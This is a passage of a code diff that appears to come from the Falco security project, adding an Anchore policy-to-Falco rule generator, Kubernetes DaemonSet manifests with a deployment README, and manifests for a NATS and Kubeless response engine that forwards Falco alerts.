+FALCO_RULE_TEMPLATE = string.Template('''
+- macro: anchore_stop_policy_evaluation_containers
+  condition: container.image.id in ($images)
+
+- rule: Run Anchore Containers with Stop Policy Evaluation
+  desc: Detect containers which does not receive a positive Policy Evaluation from Anchore Engine.
+
+  condition: evt.type=execve and proc.vpid=1 and container and anchore_stop_policy_evaluation_containers
+  output: A stop policy evaluation container from anchore has started (%container.info image=%container.image)
+  priority: INFO
+  tags: [container]
+''')
+
+
+class CreateFalcoRuleFromAnchoreStopPolicyResults:
+    def __init__(self, anchore_client):
+        self._anchore_client = anchore_client
+
+    def run(self):
+        images = self._anchore_client.get_images_with_policy_result('stop')
+
+        images = ['"{}"'.format(image) for image in images]
+        return FALCO_RULE_TEMPLATE.substitute(images=', '.join(images))
--- a/integrations/anchore-falco/infrastructure.py
+++ b/integrations/anchore-falco/infrastructure.py
@@ -0,0 +1,39 @@
+import requests
+
+
+class AnchoreClient:
+    def __init__(self, user, password, url, ssl_verify):
+        self._user = user
+        self._password = password
+        self._url = url
+        self._ssl_verify = ssl_verify
+
+    def get_images_with_policy_result(self, policy_result):
+        results = []
+        for image in self._get_all_images():
+            final_action = self._evaluate_image(image)
+
+            if final_action == 'stop':
+                results.append(image['image_id'])
+
+        return results
+
+    def _get_all_images(self):
+        response = self._do_get_request(self._url + '/images')
+        return [
+            {
+                'image_id': image['image_detail'][0]['imageId'],
+                'image_digest': image['image_detail'][0]['imageDigest'],
+                'full_tag': image['image_detail'][0]['fulltag']
+            } for image in response.json()]
+
+    def _do_get_request(self, url):
+        return requests.get(url,
+                            auth=(self._user, self._password),
+                            verify=self._ssl_verify,
+                            headers={'Content-Type': 'application/json'})
+
+    def _evaluate_image(self, image):
+        response = self._do_get_request(self._url + '/images/{}/check?tag={}'.format(image['image_digest'], image['full_tag']))
+        if response.status_code == 200:
+            return response.json()[0][image['image_digest']][image['full_tag']][0]['detail']['result']['final_action']
--- a/integrations/anchore-falco/main.py
+++ b/integrations/anchore-falco/main.py
@@ -0,0 +1,21 @@
+import os
+
+import actions, infrastructure
+
+
+def main():
+    anchore_client = infrastructure.AnchoreClient(
+        os.environ.get('ANCHORE_CLI_USER', 'admin'),
+        os.environ['ANCHORE_CLI_PASS'],
+        os.environ.get('ANCHORE_CLI_URL', 'http://localhost:8228/v1'),
+        os.environ.get('ANCHORE_CLI_SSL_VERIFY', True)
+    )
+    action = actions.CreateFalcoRuleFromAnchoreStopPolicyResults(anchore_client)
+
+    result = action.run()
+
+    print(result)
+
+
+if __name__ == '__main__':
+    main()
--- a/integrations/anchore-falco/specs/create_falco_rule_from_anchore_policy_results_spec.py
+++ b/integrations/anchore-falco/specs/create_falco_rule_from_anchore_policy_results_spec.py
@@ -0,0 +1,21 @@
+from mamba import description, it, before
+from expects import expect, contain
+
+from doublex import Stub, when
+
+import actions
+import infrastructure
+
+
+with description(actions.CreateFalcoRuleFromAnchoreStopPolicyResults) as self:
+    with before.each:
+        self.anchore_client = Stub(infrastructure.AnchoreClient)
+        self.action = actions.CreateFalcoRuleFromAnchoreStopPolicyResults(self.anchore_client)
+
+    with it('queries Anchore Server for images with Stop as policy results'):
+        image_id = 'any image id'
+        when(self.anchore_client).get_images_with_policy_result('stop').returns([image_id])
+
+        result = self.action.run()
+
+        expect(result).to(contain(image_id))
--- a/integrations/anchore-falco/specs/infrastructure/anchore_client_spec.py
+++ b/integrations/anchore-falco/specs/infrastructure/anchore_client_spec.py
@@ -0,0 +1,19 @@
+from mamba import description, it
+from expects import expect, have_length, be_above
+
+import os
+
+import infrastructure
+
+
+with description(infrastructure.AnchoreClient) as self:
+    with it('retrieves images with stop policy results'):
+        user = os.environ['ANCHORE_CLI_USER']
+        password = os.environ['ANCHORE_CLI_PASS']
+        url = os.environ['ANCHORE_CLI_URL']
+
+        client = infrastructure.AnchoreClient(user, password, url, True)
+
+        result = client.get_images_with_policy_result('stop')
+
+        expect(result).to(have_length(be_above(1)))
--- a/integrations/k8s-using-daemonset/README.md
+++ b/integrations/k8s-using-daemonset/README.md
@@ -0,0 +1,92 @@
+# Example Kubernetes Daemon Sets for Sysdig Falco
+
+This directory gives you the required YAML files to stand up Sysdig Falco on Kubernetes as a Daemon Set. This will result in a Falco Pod being deployed to each node, and thus the ability to monitor any running containers for abnormal behavior. 
+
+The two options are provided to deploy a Daemon Set:
+- `k8s-with-rbac` - This directory provides a definition to deploy a Daemon Set on Kubernetes with RBAC enabled.
+- `k8s-without-rbac` - This directory provides a definition to deploy a Daemon Set on Kubernetes without RBAC enabled. 
+
+Also provided:
+- `falco-event-generator-deployment.yaml` - A Kubernetes Deployment to generate sample events. This is useful for testing, but note it will generate a large number of events.
+
+## Deploying to Kubernetes with RBAC enabled
+
+Since v1.8 RBAC has been available in Kubernetes, and running with RBAC enabled is considered the best practice. The `k8s-with-rbac` directory provides the YAML to create a Service Account for Falco, as well as the ClusterRoles and bindings to grant the appropriate permissions to the Service Account.
+
+```
+k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-account.yaml
+serviceaccount "falco-account" created
+clusterrole "falco-cluster-role" created
+clusterrolebinding "falco-cluster-role-binding" created
+k8s-using-daemonset$
+```
+
+The Daemon Set also relies on a Kubernetes ConfigMap to store the Falco configuration and make the configuration available to the Falco Pods. This allows you to manage custom configuration without rebuilding and redeploying the underlying Pods. In order to create the ConfigMap you'll need to first need to copy the required configuration from their location in this GitHub repo to the `k8s-with-rbac/falco-config/` directory. Any modification of the configuration should be performed on these copies rather than the original files.
+
+```
+k8s-using-daemonset$ cp ../../falco.yaml k8s-with-rbac/falco-config/
+k8s-using-daemonset$ cp ../../rules/falco_rules.* k8s-with-rbac/falco-config/
+```
+
+If you want to send Falco alerts to a Slack channel, you'll want to modify the `falco.yaml` file to point to your Slack webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Add the below to the bottom of the `falco.yaml` config file you just copied to enable Slack messages.
+
+```
+program_output:
+  enabled: true
+  keep_alive: false
+  program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"
+```
+
+You will also need to enable JSON output. Find the `json_output: false` setting in the `falco.yaml` file and change it to read `json_output: true`. Any custom rules for your environment can be added to into the `falco_rules.local.yaml` file and they will be picked up by Falco at start time. You can now create the ConfigMap in Kubernetes. 
+
+```
+k8s-using-daemonset$ kubectl create configmap falco-config --from-file=k8s-with-rbac/falco-config
+configmap "falco-config" created
+k8s-using-daemonset$
+```
+
+Now that we have the requirements for our Daemon Set in place, we can create our Daemon Set.
+
+```
+k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-daemonset-configmap.yaml 
+daemonset "falco" created
+k8s-using-daemonset$
+```
+
+
+## Deploying to Kubernetes without RBAC enabled
+
+If you are running Kubernetes with Legacy Authorization enabled, you can use `kubectl` to deploy the Daemon Set provided in the `k8s-without-rbac` directory. The example provides the ability to post messages to a Slack channel via a webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Modify the [`args`](https://github.com/draios/falco/blob/dev/examples/k8s-using-daemonset/falco-daemonset.yaml#L21) passed to the Falco container to point to the appropriate URL for your webhook.
+
+```
+k8s-using-daemonset$ kubectl create -f k8s-without-rbac/falco-daemonset.yaml
+```
+
+
+## Verifying the installation
+
+In order to test that Falco is working correctly, you can launch a shell in a Pod. You should see a message in your Slack channel (if configured), or in the logs of the Falco pod.
+
+```
+k8s-using-daemonset$ kubectl get pods
+NAME          READY     STATUS    RESTARTS   AGE
+falco-74htl   1/1       Running   0          13h
+falco-fqz2m   1/1       Running   0          13h
+falco-sgjfx   1/1       Running   0          13h
+k8s-using-daemonset$ kubectl exec -it falco-74htl bash
+root@falco-74htl:/# exit
+k8s-using-daemonset$ kubectl logs falco-74htl
+{"output":"17:48:58.590038385: Notice A shell was spawned in a container with an attached terminal (user=root k8s.pod=falco-74htl container=a98c2aa8e670 shell=bash parent=<NA> cmdline=bash  terminal=34816)","priority":"Notice","rule":"Terminal shell in container","time":"2017-12-20T17:48:58.590038385Z", "output_fields": {"container.id":"a98c2aa8e670","evt.time":1513792138590038385,"k8s.pod.name":"falco-74htl","proc.cmdline":"bash ","proc.name":"bash","proc.pname":null,"proc.tty":34816,"user.name":"root"}}
+k8s-using-daemonset$
+``` 
+
+Alternatively, you can deploy the [Falco Event Generator](https://github.com/draios/falco/wiki/Generating-Sample-Events) deployement to have events automatically generated. Please note that this Deployment will generate a large number of events. 
+
+```
+k8s-using-daemonset$ kubectl create -f falco-event-generator-deployment.yaml \
+&& sleep 1 \
+&& kubectl delete -f falco-event-generator-deployment.yaml
+deployment "falco-event-generator-deployment" created
+deployment "falco-event-generator-deployment" deleted
+k8s-using-daemonset$ 
+```
--- a/integrations/k8s-using-daemonset/falco-event-generator-deployment.yaml
+++ b/integrations/k8s-using-daemonset/falco-event-generator-deployment.yaml
@@ -0,0 +1,17 @@
+apiVersion: extensions/v1beta1
+kind: Deployment
+metadata:
+  name: falco-event-generator-deployment
+  labels:
+    name: falco-event-generator-deployment
+    app: demo
+spec:
+  replicas: 1
+  template:
+    metadata:
+      labels:
+        app: falco-event-generator
+    spec:
+      containers:
+      - name: falco-event-generator
+        image: sysdig/falco-event-generator:latest
--- a/integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml
+++ b/integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml
@@ -0,0 +1,29 @@
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: falco-account
+---
+kind: ClusterRole
+apiVersion: rbac.authorization.k8s.io/v1beta1
+metadata:
+  name: falco-cluster-role
+rules:
+  - apiGroups: ["extensions",""]
+    resources: ["nodes","namespaces","pods","replicationcontrollers","services","events","configmaps"]
+    verbs: ["get","list","watch"]
+  - nonResourceURLs: ["/healthz", "/healthz/*"]
+    verbs: ["get"]
+---
+kind: ClusterRoleBinding
+apiVersion: rbac.authorization.k8s.io/v1beta1
+metadata:
+  name: falco-cluster-role-binding
+  namespace: default
+subjects:
+  - kind: ServiceAccount
+    name: falco-account
+    namespace: default
+roleRef:
+  kind: ClusterRole
+  name: falco-cluster-role
+  apiGroup: rbac.authorization.k8s.io
--- a/integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
+++ b/integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
@@ -0,0 +1,63 @@
+apiVersion: extensions/v1beta1
+kind: DaemonSet
+metadata:
+  name: falco
+  labels:
+    name: falco-daemonset
+    app: demo
+spec:
+  template:
+    metadata:
+      labels:
+        name: falco
+        app: demo
+        role: security
+    spec:
+      serviceAccount: falco-account
+      containers:
+        - name: falco
+          image: sysdig/falco:latest
+          securityContext:
+            privileged: true
+          args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk"]
+          volumeMounts:
+            - mountPath: /host/var/run/docker.sock
+              name: docker-socket
+            - mountPath: /host/dev
+              name: dev-fs
+            - mountPath: /host/proc
+              name: proc-fs
+              readOnly: true
+            - mountPath: /host/boot
+              name: boot-fs
+              readOnly: true
+            - mountPath: /host/lib/modules
+              name: lib-modules
+              readOnly: true
+            - mountPath: /host/usr
+              name: usr-fs
+              readOnly: true
+            - mountPath: /etc/falco
+              name: falco-config
+      volumes:
+        - name: docker-socket
+          hostPath:
+            path: /var/run/docker.sock
+        - name: dev-fs
+          hostPath:
+            path: /dev
+        - name: proc-fs
+          hostPath:
+            path: /proc
+        - name: boot-fs
+          hostPath:
+            path: /boot
+        - name: lib-modules
+          hostPath:
+            path: /lib/modules
+        - name: usr-fs
+          hostPath:
+            path: /usr
+        - name: falco-config
+          configMap:
+            name: falco-config
--- a/integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml
+++ b/integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml
@@ -0,0 +1,57 @@
+apiVersion: extensions/v1beta1
+kind: DaemonSet
+metadata:
+  name: falco
+  labels:
+    name: falco-daemonset
+    app: demo
+spec:
+  template:
+    metadata:
+      labels:
+        name: falco
+        app: demo
+        role: security
+    spec:
+      containers:
+        - name: falco
+          image: sysdig/falco:latest
+          securityContext:
+            privileged: true
+          args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o",  "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"]
+          volumeMounts:
+            - mountPath: /host/var/run/docker.sock
+              name: docker-socket
+            - mountPath: /host/dev
+              name: dev-fs
+            - mountPath: /host/proc
+              name: proc-fs
+              readOnly: true
+            - mountPath: /host/boot
+              name: boot-fs
+              readOnly: true
+            - mountPath: /host/lib/modules
+              name: lib-modules
+              readOnly: true
+            - mountPath: /host/usr
+              name: usr-fs
+              readOnly: true
+      volumes:
+        - name: docker-socket
+          hostPath:
+            path: /var/run/docker.sock
+        - name: dev-fs
+          hostPath:
+            path: /dev
+        - name: proc-fs
+          hostPath:
+            path: /proc
+        - name: boot-fs
+          hostPath:
+            path: /boot
+        - name: lib-modules
+          hostPath:
+            path: /lib/modules
+        - name: usr-fs
+          hostPath:
+            path: /usr
--- a/integrations/kubernetes-response-engine/README.md
+++ b/integrations/kubernetes-response-engine/README.md
@@ -0,0 +1,18 @@
+# Kubernetes Response Engine for Sysdig Falco
+
+A response engine for Falco that allows to process security events executing playbooks to respond to security threats.
+
+## Architecture
+
+* *[Falco](https://sysdig.com/opensource/falco/)* monitors containers and processes to alert on unexpected behavior. This is defined through the runtime policy built from multiple rules that define what the system should and shouldn't do.
+* *falco-nats* forwards the alert to a message broker service into a topic compound by `falco.<severity>.<rule_name_slugified>`.
+* *[NATS](https://nats.io/)*, our message broker, delivers the alert to any subscribers to the different topics.
+* *[Kubeless](https://kubeless.io/)*, a FaaS framework that runs in Kubernetes, receives the security events and executes the configured playbooks.
+
+## Glossary
+
+* *Security event*: Alert sent by Falco when a configured rule matches the behaviour on that host.
+* *Playbook*: Each piece code executed when an alert is received to respond to that threat in an automated way, some examples include:
+  - sending an alert to Slack
+  - stop the pod killing the container
+  - taint the specific node where the pod is running
--- a/integrations/kubernetes-response-engine/deployment/Makefile
+++ b/integrations/kubernetes-response-engine/deployment/Makefile
@@ -0,0 +1,9 @@
+deploy:
+	kubectl apply -f nats/
+	kubectl apply -f kubeless/
+	kubectl apply -f network-policy.yaml
+
+clean:
+	kubectl delete -f kubeless/
+	kubectl delete -f nats/
+	kubectl delete -f network-policy.yaml
--- a/integrations/kubernetes-response-engine/deployment/README.md
+++ b/integrations/kubernetes-response-engine/deployment/README.md
@@ -0,0 +1,20 @@
+# Kubernetes Manifests for Kubernetes Response Engine
+
+In this directory are the manifests for creating required infrastructure in the
+Kubernetes cluster
+
+## Deploy
+
+For deploying NATS, Falco + Falco-NATS output and Kubeless just run default Makefile target:
+
+```
+make
+```
+
+## Clean
+
+You can clean your cluster with:
+
+```
+make clean
+```
--- a/integrations/kubernetes-response-engine/deployment/kubeless/kubeless-namespace.yaml
+++ b/integrations/kubernetes-response-engine/deployment/kubeless/kubeless-namespace.yaml
@@ -0,0 +1,5 @@
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: kubeless
--- a/integrations/kubernetes-response-engine/deployment/kubeless/kubeless-v1.0.0-alpha.6.yaml
+++ b/integrations/kubernetes-response-engine/deployment/kubeless/kubeless-v1.0.0-alpha.6.yaml
@@ -0,0 +1,369 @@
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: controller-acct
+  namespace: kubeless
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  name: kubeless-controller-deployer
+rules:
+- apiGroups:
+  - ""
+  resources:
+  - services
+  - configmaps
+  verbs:
+  - create
+  - get
+  - delete
+  - list
+  - update
+  - patch
+- apiGroups:
+  - apps
+  - extensions
+  resources:
+  - deployments
+  verbs:
+  - create
+  - get
+  - delete
+  - list
+  - update
+  - patch
+- apiGroups:
+  - ""
+  resources:
+  - pods
+  verbs:
+  - list
+  - delete
+- apiGroups:
+  - ""
+  resourceNames:
+  - kubeless-registry-credentials
+  resources:
+  - secrets
+  verbs:
+  - get
+- apiGroups:
+  - kubeless.io
+  resources:
+  - functions
+  - httptriggers
+  - cronjobtriggers
+  verbs:
+  - get
+  - list
+  - watch
+  - update
+  - delete
+- apiGroups:
+  - batch
+  resources:
+  - cronjobs
+  - jobs
+  verbs:
+  - create
+  - get
+  - delete
+  - deletecollection
+  - list
+  - update
+  - patch
+- apiGroups:
+  - autoscaling
+  resources:
+  - horizontalpodautoscalers
+  verbs:
+  - create
+  - get
+  - delete
+  - list
+  - update
+  - patch
+- apiGroups:
+  - apiextensions.k8s.io
+  resources:
+  - customresourcedefinitions
+  verbs:
+  - get
+  - list
+- apiGroups:
+  - monitoring.coreos.com
+  resources:
+  - alertmanagers
+  - prometheuses
+  - servicemonitors
+  verbs:
+  - '*'
+- apiGroups:
+  - extensions
+  resources:
+  - ingresses
+  verbs:
+  - create
+  - get
+  - list
+  - update
+  - delete
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: kubeless-controller-deployer
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: kubeless-controller-deployer
+subjects:
+- kind: ServiceAccount
+  name: controller-acct
+  namespace: kubeless
+---
+apiVersion: apiextensions.k8s.io/v1beta1
+description: Kubernetes Native Serverless Framework
+kind: CustomResourceDefinition
+metadata:
+  name: functions.kubeless.io
+spec:
+  group: kubeless.io
+  names:
+    kind: Function
+    plural: functions
+    singular: function
+  scope: Namespaced
+  version: v1beta1
+---
+apiVersion: apiextensions.k8s.io/v1beta1
+description: CRD object for HTTP trigger type
+kind: CustomResourceDefinition
+metadata:
+  name: httptriggers.kubeless.io
+spec:
+  group: kubeless.io
+  names:
+    kind: HTTPTrigger
+    plural: httptriggers
+    singular: httptrigger
+  scope: Namespaced
+  version: v1beta1
+---
+apiVersion: apiextensions.k8s.io/v1beta1
+description: CRD object for HTTP trigger type
+kind: CustomResourceDefinition
+metadata:
+  name: cronjobtriggers.kubeless.io
+spec:
+  group: kubeless.io
+  names:
+    kind: CronJobTrigger
+    plural: cronjobtriggers
+    singular: cronjobtrigger
+  scope: Namespaced
+  version: v1beta1
+---
+apiVersion: v1
+data:
+  builder-image: kubeless/function-image-builder:v1.0.0-alpha.6
+  builder-image-secret: ""
+  deployment: '{}'
+  enable-build-step: "false"
+  function-registry-tls-verify: "true"
+  ingress-enabled: "false"
+  provision-image: kubeless/unzip@sha256:f162c062973cca05459834de6ed14c039d45df8cdb76097f50b028a1621b3697
+  provision-image-secret: ""
+  runtime-images: |-
+    [
+      {
+        "ID": "python",
+        "compiled": false,
+        "versions": [
+          {
+            "name": "python27",
+            "version": "2.7",
+            "runtimeImage": "kubeless/python@sha256:07cfb0f3d8b6db045dc317d35d15634d7be5e436944c276bf37b1c630b03add8",
+            "initImage": "python:2.7"
+          },
+          {
+            "name": "python34",
+            "version": "3.4",
+            "runtimeImage": "kubeless/python@sha256:f19640c547a3f91dbbfb18c15b5e624029b4065c1baf2892144e07c36f0a7c8f",
+            "initImage": "python:3.4"
+          },
+          {
+            "name": "python36",
+            "version": "3.6",
+            "runtimeImage": "kubeless/python@sha256:0c9f8f727d42625a4e25230cfe612df7488b65f283e7972f84108d87e7443d72",
+            "initImage": "python:3.6"
+          }
+        ],
+        "depName": "requirements.txt",
+        "fileNameSuffix": ".py"
+      },
+      {
+        "ID": "nodejs",
+        "compiled": false,
+        "versions": [
+          {
+            "name": "node6",
+            "version": "6",
+            "runtimeImage": "kubeless/nodejs@sha256:013facddb0f66c150844192584d823d7dfb2b5b8d79fd2ae98439c86685da657",
+            "initImage": "node:6.10"
+          },
+          {
+            "name": "node8",
+            "version": "8",
+            "runtimeImage": "kubeless/nodejs@sha256:b155d7e20e333044b60009c12a25a97c84eed610f2a3d9d314b47449dbdae0e5",
+            "initImage": "node:8"
+          }
+        ],
+        "depName": "package.json",
+        "fileNameSuffix": ".js"
+      },
+      {
+        "ID": "nodejs_distroless",
+        "compiled": false,
+        "versions": [
+          {
+            "name": "node8",
+            "version": "8",
+            "runtimeImage": "henrike42/kubeless/runtimes/nodejs/distroless:0.0.2",
+            "initImage": "node:8"
+          }
+        ],
+        "depName": "package.json",
+        "fileNameSuffix": ".js"
+      },
+      {
+        "ID": "ruby",
+        "compiled": false,
+        "versions": [
+          {
+            "name": "ruby24",
+            "version": "2.4",
+            "runtimeImage": "kubeless/ruby@sha256:01665f1a32fe4fab4195af048627857aa7b100e392ae7f3e25a44bd296d6f105",
+            "initImage": "bitnami/ruby:2.4"
+          }
+        ],
+        "depName": "Gemfile",
+        "fileNameSuffix": ".rb"
+      },
+      {
+        "ID": "php",
+        "compiled": false,
+        "versions": [
+          {
+            "name": "php72",
+            "version": "7.2",
+            "runtimeImage": "kubeless/php@sha256:9b86066b2640bedcd88acb27f43dfaa2b338f0d74d9d91131ea781402f7ec8ec",
+            "initImage": "composer:1.6"
+          }
+        ],
+        "depName": "composer.json",
+        "fileNameSuffix": ".php"
+      },
+      {
+        "ID": "go",
+        "compiled": true,
+        "versions": [
+          {
+            "name": "go1.10",
+            "version": "1.10",
+            "runtimeImage": "kubeless/go@sha256:e2fd49f09b6ff8c9bac6f1592b3119ea74237c47e2955a003983e08524cb3ae5",
+            "initImage": "kubeless/go-init@sha256:983b3f06452321a2299588966817e724d1a9c24be76cf1b12c14843efcdff502"
+          }
+        ],
+        "depName": "Gopkg.toml",
+        "fileNameSuffix": ".go"
+      },
+      {
+        "ID": "dotnetcore",
+        "compiled": true,
+        "versions": [
+          {
+            "name": "dotnetcore2.0",
+            "version": "2.0",
+            "runtimeImage": "allantargino/kubeless-dotnetcore@sha256:1699b07d9fc0276ddfecc2f823f272d96fd58bbab82d7e67f2fd4982a95aeadc",
+            "initImage": "allantargino/aspnetcore-build@sha256:0d60f845ff6c9c019362a68b87b3920f3eb2d32f847f2d75e4d190cc0ce1d81c"
+          }
+        ],
+        "depName": "project.csproj",
+        "fileNameSuffix": ".cs"
+      },
+      {
+        "ID": "java",
+        "compiled": true,
+        "versions": [
+          {
+            "name": "java1.8",
+            "version": "1.8",
+            "runtimeImage": "kubeless/java@sha256:debf9502545f4c0e955eb60fabb45748c5d98ed9365c4a508c07f38fc7fefaac",
+            "initImage": "kubeless/java-init@sha256:7e5e4376d3ab76c336d4830c9ed1b7f9407415feca49b8c2bf013e279256878f"
+          }
+        ],
+        "depName": "pom.xml",
+        "fileNameSuffix": ".java"
+      },
+      {
+         "ID": "ballerina",
+         "compiled": true,
+         "versions": [
+           {
+              "name": "ballerina0.975.0",
+              "version": "0.975.0",
+              "runtimeImage": "kubeless/ballerina@sha256:83e51423972f4b0d6b419bee0b4afb3bb87d2bf1b604ebc4366c430e7cc28a35",
+              "initImage": "kubeless/ballerina-init@sha256:05857ce439a7e290f9d86f8cb38ea3b574670c0c0e91af93af06686fa21ecf4f"
+           }
+         ],
+         "depName": "",
+         "fileNameSuffix": ".bal"
+      }
+    ]
+  service-type: ClusterIP
+kind: ConfigMap
+metadata:
+  name: kubeless-config
+  namespace: kubeless
+---
+apiVersion: apps/v1beta1
+kind: Deployment
+metadata:
+  labels:
+    kubeless: controller
+  name: kubeless-controller-manager
+  namespace: kubeless
+spec:
+  selector:
+    matchLabels:
+      kubeless: controller
+  template:
+    metadata:
+      labels:
+        kubeless: controller
+    spec:
+      containers:
+      - env:
+        - name: KUBELESS_INGRESS_ENABLED
+          valueFrom:
+            configMapKeyRef:
+              key: ingress-enabled
+              name: kubeless-config
+        - name: KUBELESS_SERVICE_TYPE
+          valueFrom:
+            configMapKeyRef:
+              key: service-type
+              name: kubeless-config
+        - name: KUBELESS_NAMESPACE
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace
+        - name: KUBELESS_CONFIG
+          value: kubeless-config
+        image: bitnami/kubeless-controller-manager:v1.0.0-alpha.6
+        imagePullPolicy: IfNotPresent
+        name: kubeless-controller-manager
+      serviceAccountName: controller-acct
--- a/integrations/kubernetes-response-engine/deployment/kubeless/nats-v1.0.0-alpha.6.yaml
+++ b/integrations/kubernetes-response-engine/deployment/kubeless/nats-v1.0.0-alpha.6.yaml
@@ -0,0 +1,74 @@
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  name: nats-controller-deployer
+rules:
+- apiGroups:
+  - ""
+  resources:
+  - services
+  - configmaps
+  verbs:
+  - get
+  - list
+- apiGroups:
+  - kubeless.io
+  resources:
+  - functions
+  - natstriggers
+  verbs:
+  - get
+  - list
+  - watch
+  - update
+  - delete
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: nats-controller-deployer
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: nats-controller-deployer
+subjects:
+- kind: ServiceAccount
+  name: controller-acct
+  namespace: kubeless
+---
+apiVersion: apiextensions.k8s.io/v1beta1
+description: CRD object for NATS trigger type
+kind: CustomResourceDefinition
+metadata:
+  name: natstriggers.kubeless.io
+spec:
+  group: kubeless.io
+  names:
+    kind: NATSTrigger
+    plural: natstriggers
+    singular: natstrigger
+  scope: Namespaced
+  version: v1beta1
+---
+apiVersion: apps/v1beta1
+kind: Deployment
+metadata:
+  labels:
+    kubeless: nats-trigger-controller
+  name: nats-trigger-controller
+  namespace: kubeless
+spec:
+  selector:
+    matchLabels:
+      kubeless: nats-trigger-controller
+  template:
+    metadata:
+      labels:
+        kubeless: nats-trigger-controller
+    spec:
+      containers:
+      - image: bitnami/nats-trigger-controller:v1.0.0-alpha.6
+        imagePullPolicy: IfNotPresent
+        name: nats-trigger-controller
+      serviceAccountName: controller-acct
--- a/integrations/kubernetes-response-engine/deployment/nats/deployment-rbac.yaml
+++ b/integrations/kubernetes-response-engine/deployment/nats/deployment-rbac.yaml
@@ -0,0 +1,82 @@
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: nats-io
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: nats-operator
+  namespace: nats-io
+---
+apiVersion: apps/v1beta2
+kind: Deployment
+metadata:
+  name: nats-operator
+  namespace: nats-io
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      name: nats-operator
+  template:
+    metadata:
+      labels:
+        name: nats-operator
+    spec:
+      serviceAccountName: nats-operator
+      containers:
+      - name: nats-operator
+        image: connecteverything/nats-operator:0.2.2-v1alpha2
+        imagePullPolicy: Always
+        env:
+        - name: MY_POD_NAMESPACE
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace
+        - name: MY_POD_NAME
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.name
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: nats-io:nats-operator-binding
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: nats-io:nats-operator
+subjects:
+- kind: ServiceAccount
+  name: nats-operator
+  namespace: nats-io
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: nats-io:nats-operator
+rules:
+# Allow creating CRDs
+- apiGroups:
+  - apiextensions.k8s.io
+  resources:
+  - customresourcedefinitions
+  verbs: ["*"]
+# Allow all actions on NatsClusters
+- apiGroups:
+  - nats.io
+  resources:
+  - natsclusters
+  verbs: ["*"]
+# Allow actions on basic Kubernetes objects
+- apiGroups: [""]
+  resources:
+  - configmaps
+  - secrets
+  - pods
+  - services
+  - endpoints
+  - events
+  verbs: ["*"]
--- a/integrations/kubernetes-response-engine/deployment/nats/nats-cluster.yaml
+++ b/integrations/kubernetes-response-engine/deployment/nats/nats-cluster.yaml
@@ -0,0 +1,8 @@
+apiVersion: "nats.io/v1alpha2"
+kind: "NatsCluster"
+metadata:
+  name: "nats"
+  namespace: "nats-io"
+spec:
+  size: 3
+  version: "1.1.0"
--- a/integrations/kubernetes-response-engine/deployment/network-policy.yaml
+++ b/integrations/kubernetes-response-engine/deployment/network-policy.yaml
@@ -0,0 +1,11 @@
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+  name: isolate
+spec:
+  podSelector:
+    matchLabels:
+      isolated: 'true'
+  policyTypes:
+  - Ingress
+  - Egress
--- a/integrations/kubernetes-response-engine/falco-nats/.gitignore
+++ b/integrations/kubernetes-response-engine/falco-nats/.gitignore
@@ -0,0 +1 @@
+falco-nats
--- a/integrations/kubernetes-response-engine/falco-nats/Dockerfile
+++ b/integrations/kubernetes-response-engine/falco-nats/Dockerfile
@@ -0,0 +1,5 @@
+FROM alpine:latest
+
+COPY ./falco-nats /bin/
+
+CMD ["/bin/falco-nats"]
--- a/integrations/kubernetes-response-engine/falco-nats/Makefile
+++ b/integrations/kubernetes-response-engine/falco-nats/Makefile
@@ -0,0 +1,12 @@
+build:
+	GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -ldflags="-s" -o falco-nats main.go
+
+deps:
+	go get -u github.com/nats-io/go-nats
+
+clean:
+	rm falco-nats
+
+docker: build
+	docker build -t sysdig/falco-nats .
+	docker push sysdig/falco-nats
--- a/integrations/kubernetes-response-engine/falco-nats/README.md
+++ b/integrations/kubernetes-response-engine/falco-nats/README.md
@@ -0,0 +1,27 @@
+# NATS output for Sysdig Falco
+
+As Falco does not support a NATS output natively, we have created this small
